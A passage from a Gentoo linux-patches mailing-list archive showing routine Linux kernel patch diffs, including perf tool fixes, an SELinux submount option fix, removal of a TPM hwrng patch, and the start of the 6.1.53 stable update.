++    "BriefDescription": "The processor's L1 data cache was reloaded from a source beyond the local core's L2 due to a demand miss."
+   },
+   {
+     "EventCode": "0x30010",
+@@ -52,6 +47,6 @@
+   {
+     "EventCode": "0x4D05C",
+     "EventName": "PM_DPP_FLOP_CMPL",
+-    "BriefDescription": "Double-Precision or Quad-Precision instructions completed."
++    "BriefDescription": "Double-Precision or Quad-Precision instruction completed."
+   }
+ ]
+diff --git a/tools/perf/tests/shell/stat_bpf_counters.sh b/tools/perf/tests/shell/stat_bpf_counters.sh
+index 13473aeba489c..6bf24b85294c7 100755
+--- a/tools/perf/tests/shell/stat_bpf_counters.sh
++++ b/tools/perf/tests/shell/stat_bpf_counters.sh
+@@ -22,10 +22,10 @@ compare_number()
+ }
+ 
+ # skip if --bpf-counters is not supported
+-if ! perf stat --bpf-counters true > /dev/null 2>&1; then
++if ! perf stat -e cycles --bpf-counters true > /dev/null 2>&1; then
+ 	if [ "$1" = "-v" ]; then
+ 		echo "Skipping: --bpf-counters not supported"
+-		perf --no-pager stat --bpf-counters true || true
++		perf --no-pager stat -e cycles --bpf-counters true || true
+ 	fi
+ 	exit 2
+ fi
+diff --git a/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh b/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh
+index d724855d097c2..e75d0780dc788 100755
+--- a/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh
++++ b/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh
+@@ -25,22 +25,22 @@ check_bpf_counter()
+ find_cgroups()
+ {
+ 	# try usual systemd slices first
+-	if [ -d /sys/fs/cgroup/system.slice -a -d /sys/fs/cgroup/user.slice ]; then
++	if [ -d /sys/fs/cgroup/system.slice ] && [ -d /sys/fs/cgroup/user.slice ]; then
+ 		test_cgroups="system.slice,user.slice"
+ 		return
+ 	fi
+ 
+ 	# try root and self cgroups
+-	local self_cgrp=$(grep perf_event /proc/self/cgroup | cut -d: -f3)
+-	if [ -z ${self_cgrp} ]; then
++	find_cgroups_self_cgrp=$(grep perf_event /proc/self/cgroup | cut -d: -f3)
++	if [ -z ${find_cgroups_self_cgrp} ]; then
+ 		# cgroup v2 doesn't specify perf_event
+-		self_cgrp=$(grep ^0: /proc/self/cgroup | cut -d: -f3)
++		find_cgroups_self_cgrp=$(grep ^0: /proc/self/cgroup | cut -d: -f3)
+ 	fi
+ 
+-	if [ -z ${self_cgrp} ]; then
++	if [ -z ${find_cgroups_self_cgrp} ]; then
+ 		test_cgroups="/"
+ 	else
+-		test_cgroups="/,${self_cgrp}"
++		test_cgroups="/,${find_cgroups_self_cgrp}"
+ 	fi
+ }
+ 
+@@ -48,13 +48,11 @@ find_cgroups()
+ # Just check if it runs without failure and has non-zero results.
+ check_system_wide_counted()
+ {
+-	local output
+-
+-	output=$(perf stat -a --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, sleep 1  2>&1)
+-	if echo ${output} | grep -q -F "<not "; then
++	check_system_wide_counted_output=$(perf stat -a --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, sleep 1  2>&1)
++	if echo ${check_system_wide_counted_output} | grep -q -F "<not "; then
+ 		echo "Some system-wide events are not counted"
+ 		if [ "${verbose}" = "1" ]; then
+-			echo ${output}
++			echo ${check_system_wide_counted_output}
+ 		fi
+ 		exit 1
+ 	fi
+@@ -62,13 +60,11 @@ check_system_wide_counted()
+ 
+ check_cpu_list_counted()
+ {
+-	local output
+-
+-	output=$(perf stat -C 1 --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, taskset -c 1 sleep 1  2>&1)
+-	if echo ${output} | grep -q -F "<not "; then
++	check_cpu_list_counted_output=$(perf stat -C 0,1 --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, taskset -c 1 sleep 1  2>&1)
++	if echo ${check_cpu_list_counted_output} | grep -q -F "<not "; then
+ 		echo "Some CPU events are not counted"
+ 		if [ "${verbose}" = "1" ]; then
+-			echo ${output}
++			echo ${check_cpu_list_counted_output}
+ 		fi
+ 		exit 1
+ 	fi
+diff --git a/tools/perf/ui/browsers/hists.c b/tools/perf/ui/browsers/hists.c
+index b72ee68222228..fd3e67d2c6bdd 100644
+--- a/tools/perf/ui/browsers/hists.c
++++ b/tools/perf/ui/browsers/hists.c
+@@ -407,11 +407,6 @@ static bool hist_browser__selection_has_children(struct hist_browser *browser)
+ 	return container_of(ms, struct callchain_list, ms)->has_children;
+ }
+ 
+-static bool hist_browser__he_selection_unfolded(struct hist_browser *browser)
+-{
+-	return browser->he_selection ? browser->he_selection->unfolded : false;
+-}
+-
+ static bool hist_browser__selection_unfolded(struct hist_browser *browser)
+ {
+ 	struct hist_entry *he = browser->he_selection;
+@@ -584,8 +579,8 @@ static int hierarchy_set_folding(struct hist_browser *hb, struct hist_entry *he,
+ 	return n;
+ }
+ 
+-static void __hist_entry__set_folding(struct hist_entry *he,
+-				      struct hist_browser *hb, bool unfold)
++static void hist_entry__set_folding(struct hist_entry *he,
++				    struct hist_browser *hb, bool unfold)
+ {
+ 	hist_entry__init_have_children(he);
+ 	he->unfolded = unfold ? he->has_children : false;
+@@ -603,34 +598,12 @@ static void __hist_entry__set_folding(struct hist_entry *he,
+ 		he->nr_rows = 0;
+ }
+ 
+-static void hist_entry__set_folding(struct hist_entry *he,
+-				    struct hist_browser *browser, bool unfold)
+-{
+-	double percent;
+-
+-	percent = hist_entry__get_percent_limit(he);
+-	if (he->filtered || percent < browser->min_pcnt)
+-		return;
+-
+-	__hist_entry__set_folding(he, browser, unfold);
+-
+-	if (!he->depth || unfold)
+-		browser->nr_hierarchy_entries++;
+-	if (he->leaf)
+-		browser->nr_callchain_rows += he->nr_rows;
+-	else if (unfold && !hist_entry__has_hierarchy_children(he, browser->min_pcnt)) {
+-		browser->nr_hierarchy_entries++;
+-		he->has_no_entry = true;
+-		he->nr_rows = 1;
+-	} else
+-		he->has_no_entry = false;
+-}
+-
+ static void
+ __hist_browser__set_folding(struct hist_browser *browser, bool unfold)
+ {
+ 	struct rb_node *nd;
+ 	struct hist_entry *he;
++	double percent;
+ 
+ 	nd = rb_first_cached(&browser->hists->entries);
+ 	while (nd) {
+@@ -640,6 +613,21 @@ __hist_browser__set_folding(struct hist_browser *browser, bool unfold)
+ 		nd = __rb_hierarchy_next(nd, HMD_FORCE_CHILD);
+ 
+ 		hist_entry__set_folding(he, browser, unfold);
++
++		percent = hist_entry__get_percent_limit(he);
++		if (he->filtered || percent < browser->min_pcnt)
++			continue;
++
++		if (!he->depth || unfold)
++			browser->nr_hierarchy_entries++;
++		if (he->leaf)
++			browser->nr_callchain_rows += he->nr_rows;
++		else if (unfold && !hist_entry__has_hierarchy_children(he, browser->min_pcnt)) {
++			browser->nr_hierarchy_entries++;
++			he->has_no_entry = true;
++			he->nr_rows = 1;
++		} else
++			he->has_no_entry = false;
+ 	}
+ }
+ 
+@@ -659,8 +647,10 @@ static void hist_browser__set_folding_selected(struct hist_browser *browser, boo
+ 	if (!browser->he_selection)
+ 		return;
+ 
+-	hist_entry__set_folding(browser->he_selection, browser, unfold);
+-	browser->b.nr_entries = hist_browser__nr_entries(browser);
++	if (unfold == browser->he_selection->unfolded)
++		return;
++
++	hist_browser__toggle_fold(browser);
+ }
+ 
+ static void ui_browser__warn_lost_events(struct ui_browser *browser)
+@@ -732,8 +722,8 @@ static int hist_browser__handle_hotkey(struct hist_browser *browser, bool warn_l
+ 		hist_browser__set_folding(browser, true);
+ 		break;
+ 	case 'e':
+-		/* Expand the selected entry. */
+-		hist_browser__set_folding_selected(browser, !hist_browser__he_selection_unfolded(browser));
++		/* Toggle expand/collapse the selected entry. */
++		hist_browser__toggle_fold(browser);
+ 		break;
+ 	case 'H':
+ 		browser->show_headers = !browser->show_headers;
+@@ -1779,7 +1769,7 @@ static void hists_browser__hierarchy_headers(struct hist_browser *browser)
+ 	hists_browser__scnprintf_hierarchy_headers(browser, headers,
+ 						   sizeof(headers));
+ 
+-	ui_browser__gotorc(&browser->b, 0, 0);
++	ui_browser__gotorc_title(&browser->b, 0, 0);
+ 	ui_browser__set_color(&browser->b, HE_COLORSET_ROOT);
+ 	ui_browser__write_nstring(&browser->b, headers, browser->b.width + 1);
+ }
+diff --git a/tools/perf/util/annotate.c b/tools/perf/util/annotate.c
+index db475e44f42fa..a9122ea3b44c4 100644
+--- a/tools/perf/util/annotate.c
++++ b/tools/perf/util/annotate.c
+@@ -1756,8 +1756,11 @@ static int symbol__disassemble_bpf(struct symbol *sym,
+ 	perf_exe(tpath, sizeof(tpath));
+ 
+ 	bfdf = bfd_openr(tpath, NULL);
+-	assert(bfdf);
+-	assert(bfd_check_format(bfdf, bfd_object));
++	if (bfdf == NULL)
++		abort();
++
++	if (!bfd_check_format(bfdf, bfd_object))
++		abort();
+ 
+ 	s = open_memstream(&buf, &buf_size);
+ 	if (!s) {
+@@ -1805,7 +1808,8 @@ static int symbol__disassemble_bpf(struct symbol *sym,
+ #else
+ 	disassemble = disassembler(bfdf);
+ #endif
+-	assert(disassemble);
++	if (disassemble == NULL)
++		abort();
+ 
+ 	fflush(s);
+ 	do {
+diff --git a/tools/perf/util/header.c b/tools/perf/util/header.c
+index 98dfaf84bd137..9e2dce70b1300 100644
+--- a/tools/perf/util/header.c
++++ b/tools/perf/util/header.c
+@@ -4331,7 +4331,8 @@ int perf_event__process_attr(struct perf_tool *tool __maybe_unused,
+ 			     union perf_event *event,
+ 			     struct evlist **pevlist)
+ {
+-	u32 i, ids, n_ids;
++	u32 i, n_ids;
++	u64 *ids;
+ 	struct evsel *evsel;
+ 	struct evlist *evlist = *pevlist;
+ 
+@@ -4347,9 +4348,8 @@ int perf_event__process_attr(struct perf_tool *tool __maybe_unused,
+ 
+ 	evlist__add(evlist, evsel);
+ 
+-	ids = event->header.size;
+-	ids -= (void *)&event->attr.id - (void *)event;
+-	n_ids = ids / sizeof(u64);
++	n_ids = event->header.size - sizeof(event->header) - event->attr.attr.size;
++	n_ids = n_ids / sizeof(u64);
+ 	/*
+ 	 * We don't have the cpu and thread maps on the header, so
+ 	 * for allocating the perf_sample_id table we fake 1 cpu and
+@@ -4358,8 +4358,9 @@ int perf_event__process_attr(struct perf_tool *tool __maybe_unused,
+ 	if (perf_evsel__alloc_id(&evsel->core, 1, n_ids))
+ 		return -ENOMEM;
+ 
++	ids = (void *)&event->attr.attr + event->attr.attr.size;
+ 	for (i = 0; i < n_ids; i++) {
+-		perf_evlist__id_add(&evlist->core, &evsel->core, 0, i, event->attr.id[i]);
++		perf_evlist__id_add(&evlist->core, &evsel->core, 0, i, ids[i]);
+ 	}
+ 
+ 	return 0;
+diff --git a/tools/testing/selftests/kselftest/runner.sh b/tools/testing/selftests/kselftest/runner.sh
+index 294619ade49fe..1333ab1eda708 100644
+--- a/tools/testing/selftests/kselftest/runner.sh
++++ b/tools/testing/selftests/kselftest/runner.sh
+@@ -35,7 +35,8 @@ tap_timeout()
+ {
+ 	# Make sure tests will time out if utility is available.
+ 	if [ -x /usr/bin/timeout ] ; then
+-		/usr/bin/timeout --foreground "$kselftest_timeout" $1
++		/usr/bin/timeout --foreground "$kselftest_timeout" \
++			/usr/bin/timeout "$kselftest_timeout" $1
+ 	else
+ 		$1
+ 	fi
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index 05400462c7799..aa646e0661f36 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -72,7 +72,7 @@ endef
+ run_tests: all
+ ifdef building_out_of_srctree
+ 	@if [ "X$(TEST_PROGS)$(TEST_PROGS_EXTENDED)$(TEST_FILES)" != "X" ]; then \
+-		rsync -aLq $(TEST_PROGS) $(TEST_PROGS_EXTENDED) $(TEST_FILES) $(OUTPUT); \
++		rsync -aq --copy-unsafe-links $(TEST_PROGS) $(TEST_PROGS_EXTENDED) $(TEST_FILES) $(OUTPUT); \
+ 	fi
+ 	@if [ "X$(TEST_PROGS)" != "X" ]; then \
+ 		$(call RUN_TESTS, $(TEST_GEN_PROGS) $(TEST_CUSTOM_PROGS) \
+@@ -86,7 +86,7 @@ endif
+ 
+ define INSTALL_SINGLE_RULE
+ 	$(if $(INSTALL_LIST),@mkdir -p $(INSTALL_PATH))
+-	$(if $(INSTALL_LIST),rsync -aL $(INSTALL_LIST) $(INSTALL_PATH)/)
++	$(if $(INSTALL_LIST),rsync -a --copy-unsafe-links $(INSTALL_LIST) $(INSTALL_PATH)/)
+ endef
+ 
+ define INSTALL_RULE


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-15 18:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-15 18:04 UTC (permalink / raw
  To: gentoo-commits

commit:     5df5f5fb4856b26077f84645a8c9ed2b8bae0edf
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Sep 15 18:04:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Sep 15 18:04:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5df5f5fb

selinux: fix handling of empty opts in selinux_fs_context_submount()6.5

Bug: https://bugs.gentoo.org/914204

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                   |  4 +++
 1515_selinux-fix-handling-of-empty-opts.patch | 51 +++++++++++++++++++++++++++
 2 files changed, 55 insertions(+)

diff --git a/0000_README b/0000_README
index 053298cf..e0a65c77 100644
--- a/0000_README
+++ b/0000_README
@@ -263,6 +263,10 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
+Patch:  1515_selinux-fix-handling-of-empty-opts.patch
+From:   https://www.spinics.net/lists/linux-fsdevel/msg249428.html
+Desc:   selinux: fix handling of empty opts in selinux_fs_context_submount()
+
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1515_selinux-fix-handling-of-empty-opts.patch b/1515_selinux-fix-handling-of-empty-opts.patch
new file mode 100644
index 00000000..10336ec5
--- /dev/null
+++ b/1515_selinux-fix-handling-of-empty-opts.patch
@@ -0,0 +1,51 @@
+selinux: fix handling of empty opts in selinux_fs_context_submount()
+
+selinux_set_mnt_opts() relies on the fact that the mount options pointer
+is always NULL when all options are unset (specifically in its
+!selinux_initialized() branch. However, the new
+selinux_fs_context_submount() hook breaks this rule by allocating a new
+structure even if no options are set. That causes any submount created
+before a SELinux policy is loaded to be rejected in
+selinux_set_mnt_opts().
+
+Fix this by making selinux_fs_context_submount() leave fc->security
+set to NULL when there are no options to be copied from the reference
+superblock.
+
+Reported-by: Adam Williamson <awilliam@xxxxxxxxxx>
+Link: https://bugzilla.redhat.com/show_bug.cgi?id=2236345
+Fixes: d80a8f1b58c2 ("vfs, security: Fix automount superblock LSM init problem, preventing NFS sb sharing")
+Signed-off-by: Ondrej Mosnacek <omosnace@xxxxxxxxxx>
+---
+ security/selinux/hooks.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index 10350534de6d6..2aa0e219d7217 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -2775,14 +2775,20 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
+ static int selinux_fs_context_submount(struct fs_context *fc,
+ 				   struct super_block *reference)
+ {
+-	const struct superblock_security_struct *sbsec;
++	const struct superblock_security_struct *sbsec = selinux_superblock(reference);
+ 	struct selinux_mnt_opts *opts;
+ 
++	/*
++	 * Ensure that fc->security remains NULL when no options are set
++	 * as expected by selinux_set_mnt_opts().
++	 */
++	if (!(sbsec->flags & (FSCONTEXT_MNT|CONTEXT_MNT|DEFCONTEXT_MNT)))
++		return 0;
++
+ 	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
+ 	if (!opts)
+ 		return -ENOMEM;
+ 
+-	sbsec = selinux_superblock(reference);
+ 	if (sbsec->flags & FSCONTEXT_MNT)
+ 		opts->fscontext_sid = sbsec->sid;
+ 	if (sbsec->flags & CONTEXT_MNT)
+-- 
+2.41.0


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-13 11:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-13 11:19 UTC (permalink / raw
  To: gentoo-commits

commit:     71132679abcc54524dac8235d816499d3badd881
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep 13 11:19:11 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep 13 11:19:11 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=71132679

Remove redundant patch

Removed:
2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 -
 2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch | 90 ----------------------
 2 files changed, 94 deletions(-)

diff --git a/0000_README b/0000_README
index d7316905..053298cf 100644
--- a/0000_README
+++ b/0000_README
@@ -283,10 +283,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:  2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
-From:   https://lore.kernel.org/all/20230822231510.2263255-1-jarkko@kernel.org/
-Desc:   tpm: Enable hwrng only for Pluton on AMD CPUs
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch b/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
deleted file mode 100644
index 932e82ed..00000000
--- a/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From: Jarkko Sakkinen <jarkko@kernel.org>
-To: linux-integrity@vger.kernel.org
-Cc: Jerry Snitselaar <jsnitsel@redhat.com>,
-	Jarkko Sakkinen <jarkko@kernel.org>,
-	stable@vger.kernel.org, Todd Brandt <todd.e.brandt@intel.com>,
-	Peter Huewe <peterhuewe@gmx.de>, Jason Gunthorpe <jgg@ziepe.ca>,
-	Mario Limonciello <mario.limonciello@amd.com>,
-	linux-kernel@vger.kernel.org
-Subject: [PATCH v3] tpm: Enable hwrng only for Pluton on AMD CPUs
-Date: Wed, 23 Aug 2023 02:15:10 +0300	[thread overview]
-Message-ID: <20230822231510.2263255-1-jarkko@kernel.org> (raw)
-
-The vendor check introduced by commit 554b841d4703 ("tpm: Disable RNG for
-all AMD fTPMs") doesn't work properly on a number of Intel fTPMs.  On the
-reported systems the TPM doesn't reply at bootup and returns back the
-command code. This makes the TPM fail probe.
-
-Since only Microsoft Pluton is the only known combination of AMD CPU and
-fTPM from other vendor, disable hwrng otherwise. In order to make sysadmin
-aware of this, print also info message to the klog.
-
-Cc: stable@vger.kernel.org
-Fixes: 554b841d4703 ("tpm: Disable RNG for all AMD fTPMs")
-Reported-by: Todd Brandt <todd.e.brandt@intel.com>
-Closes: https://bugzilla.kernel.org/show_bug.cgi?id=217804
-Signed-off-by: Jarkko Sakkinen <jarkko@kernel.org>
----
-v3:
-* Forgot to amend config flags.
-v2:
-* CONFIG_X86
-* Removed "Reviewed-by: Jarkko Sakkinen <jarkko@kernel.org>"
-* Removed "Signed-off-by: Mario Limonciello <mario.limonciello@amd.com>"
----
- drivers/char/tpm/tpm_crb.c | 33 ++++++++-------------------------
- 1 file changed, 8 insertions(+), 25 deletions(-)
-
-diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
-index 65ff4d2fbe8d..ea085b14ab7c 100644
---- a/drivers/char/tpm/tpm_crb.c
-+++ b/drivers/char/tpm/tpm_crb.c
-@@ -463,28 +463,6 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
- 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
- }
- 
--static int crb_check_flags(struct tpm_chip *chip)
--{
--	u32 val;
--	int ret;
--
--	ret = crb_request_locality(chip, 0);
--	if (ret)
--		return ret;
--
--	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
--	if (ret)
--		goto release;
--
--	if (val == 0x414D4400U /* AMD */)
--		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
--
--release:
--	crb_relinquish_locality(chip, 0);
--
--	return ret;
--}
--
- static const struct tpm_class_ops tpm_crb = {
- 	.flags = TPM_OPS_AUTO_STARTUP,
- 	.status = crb_status,
-@@ -827,9 +805,14 @@ static int crb_acpi_add(struct acpi_device *device)
- 	if (rc)
- 		goto out;
- 
--	rc = crb_check_flags(chip);
--	if (rc)
--		goto out;
-+#ifdef CONFIG_X86
-+	/* A quirk for https://www.amd.com/en/support/kb/faq/pa-410 */
-+	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD &&
-+	    priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
-+		dev_info(dev, "Disabling hwrng\n");
-+		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
-+	}
-+#endif /* CONFIG_X86 */
- 
- 	rc = tpm_chip_register(chip);
- 
--- 
-2.39.2


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-13 11:05 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-13 11:05 UTC (permalink / raw
  To: gentoo-commits

commit:     0efe20bff15b0dcaa94fb25d6e40b0161e8201b3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep 13 11:05:07 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep 13 11:05:07 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0efe20bf

Linux patch 6.1.53

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1052_linux-6.1.53.patch | 23057 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 23061 insertions(+)

diff --git a/0000_README b/0000_README
index 9d50d635..d7316905 100644
--- a/0000_README
+++ b/0000_README
@@ -251,6 +251,10 @@ Patch:  1051_linux-6.1.52.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.52
 
+Patch:  1052_linux-6.1.53.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.53
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1052_linux-6.1.53.patch b/1052_linux-6.1.53.patch
new file mode 100644
index 00000000..29b394b8
--- /dev/null
+++ b/1052_linux-6.1.53.patch
@@ -0,0 +1,23057 @@
+diff --git a/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo b/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo
+index 531fe9d6b40aa..c7393b4dd2d88 100644
+--- a/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo
++++ b/Documentation/ABI/testing/sysfs-bus-fsi-devices-sbefifo
+@@ -5,6 +5,6 @@ Description:
+ 		Indicates whether or not this SBE device has experienced a
+ 		timeout; i.e. the SBE did not respond within the time allotted
+ 		by the driver. A value of 1 indicates that a timeout has
+-		ocurred and no transfers have completed since the timeout. A
+-		value of 0 indicates that no timeout has ocurred, or if one
+-		has, more recent transfers have completed successful.
++		occurred and no transfers have completed since the timeout. A
++		value of 0 indicates that no timeout has occurred, or if one
++		has, more recent transfers have completed successfully.
+diff --git a/Documentation/ABI/testing/sysfs-driver-chromeos-acpi b/Documentation/ABI/testing/sysfs-driver-chromeos-acpi
+index c308926e1568a..7c8e129fc1005 100644
+--- a/Documentation/ABI/testing/sysfs-driver-chromeos-acpi
++++ b/Documentation/ABI/testing/sysfs-driver-chromeos-acpi
+@@ -134,4 +134,4 @@ KernelVersion:	5.19
+ Description:
+ 		Returns the verified boot data block shared between the
+ 		firmware verification step and the kernel verification step
+-		(binary).
++		(hex dump).
+diff --git a/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml b/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml
+index 1289605456408..55800fb0221d0 100644
+--- a/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml
++++ b/Documentation/devicetree/bindings/extcon/maxim,max77843.yaml
+@@ -23,6 +23,7 @@ properties:
+ 
+   connector:
+     $ref: /schemas/connector/usb-connector.yaml#
++    unevaluatedProperties: false
+ 
+   ports:
+     $ref: /schemas/graph.yaml#/properties/ports
+diff --git a/Documentation/scsi/scsi_mid_low_api.rst b/Documentation/scsi/scsi_mid_low_api.rst
+index a8c5bd15a4400..edfd179b9c7cc 100644
+--- a/Documentation/scsi/scsi_mid_low_api.rst
++++ b/Documentation/scsi/scsi_mid_low_api.rst
+@@ -1190,11 +1190,11 @@ Members of interest:
+ 		 - pointer to scsi_device object that this command is
+                    associated with.
+     resid
+-		 - an LLD should set this signed integer to the requested
++		 - an LLD should set this unsigned integer to the requested
+                    transfer length (i.e. 'request_bufflen') less the number
+                    of bytes that are actually transferred. 'resid' is
+                    preset to 0 so an LLD can ignore it if it cannot detect
+-                   underruns (overruns should be rare). If possible an LLD
++                   underruns (overruns should not be reported). An LLD
+                    should set 'resid' prior to invoking 'done'. The most
+                    interesting case is data transfers from a SCSI target
+                    device (e.g. READs) that underrun.
+diff --git a/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst b/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst
+index cd33857d947d3..0ef49647c90bd 100644
+--- a/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst
++++ b/Documentation/userspace-api/media/v4l/ext-ctrls-codec-stateless.rst
+@@ -2923,6 +2923,13 @@ This structure contains all loop filter related parameters. See sections
+       - ``poc_lt_curr[V4L2_HEVC_DPB_ENTRIES_NUM_MAX]``
+       - PocLtCurr as described in section 8.3.2 "Decoding process for reference
+         picture set": provides the index of the long term references in DPB array.
++    * - __u8
++      - ``num_delta_pocs_of_ref_rps_idx``
++      - When the short_term_ref_pic_set_sps_flag in the slice header is equal to 0,
++        it is the same as the derived value NumDeltaPocs[RefRpsIdx]. It can be used to parse
++        the RPS data in slice headers instead of skipping it with @short_term_ref_pic_set_size.
++        When the value of short_term_ref_pic_set_sps_flag in the slice header is
++        equal to 1, num_delta_pocs_of_ref_rps_idx shall be set to 0.
+     * - struct :c:type:`v4l2_hevc_dpb_entry`
+       - ``dpb[V4L2_HEVC_DPB_ENTRIES_NUM_MAX]``
+       - The decoded picture buffer, for meta-data about reference frames.
+diff --git a/Makefile b/Makefile
+index 82aaa3ae7395b..35fc0d62898dc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 52
++SUBLEVEL = 53
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -1291,7 +1291,7 @@ prepare0: archprepare
+ # All the preparing..
+ prepare: prepare0
+ ifdef CONFIG_RUST
+-	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh -v
++	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh
+ 	$(Q)$(MAKE) $(build)=rust
+ endif
+ 
+@@ -1817,7 +1817,7 @@ $(DOC_TARGETS):
+ # "Is Rust available?" target
+ PHONY += rustavailable
+ rustavailable:
+-	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh -v && echo "Rust is available!"
++	$(Q)$(CONFIG_SHELL) $(srctree)/scripts/rust_is_available.sh && echo "Rust is available!"
+ 
+ # Documentation target
+ #
+diff --git a/arch/arm/boot/dts/Makefile b/arch/arm/boot/dts/Makefile
+index 6aa7dc4db2fc8..df6d905eeb877 100644
+--- a/arch/arm/boot/dts/Makefile
++++ b/arch/arm/boot/dts/Makefile
+@@ -331,6 +331,7 @@ dtb-$(CONFIG_MACH_KIRKWOOD) += \
+ 	kirkwood-iconnect.dtb \
+ 	kirkwood-iomega_ix2_200.dtb \
+ 	kirkwood-is2.dtb \
++	kirkwood-km_fixedeth.dtb \
+ 	kirkwood-km_kirkwood.dtb \
+ 	kirkwood-l-50.dtb \
+ 	kirkwood-laplug.dtb \
+@@ -861,7 +862,10 @@ dtb-$(CONFIG_ARCH_OMAP3) += \
+ 	am3517-craneboard.dtb \
+ 	am3517-evm.dtb \
+ 	am3517_mt_ventoux.dtb \
++	logicpd-torpedo-35xx-devkit.dtb \
+ 	logicpd-torpedo-37xx-devkit.dtb \
++	logicpd-torpedo-37xx-devkit-28.dtb \
++	logicpd-som-lv-35xx-devkit.dtb \
+ 	logicpd-som-lv-37xx-devkit.dtb \
+ 	omap3430-sdp.dtb \
+ 	omap3-beagle.dtb \
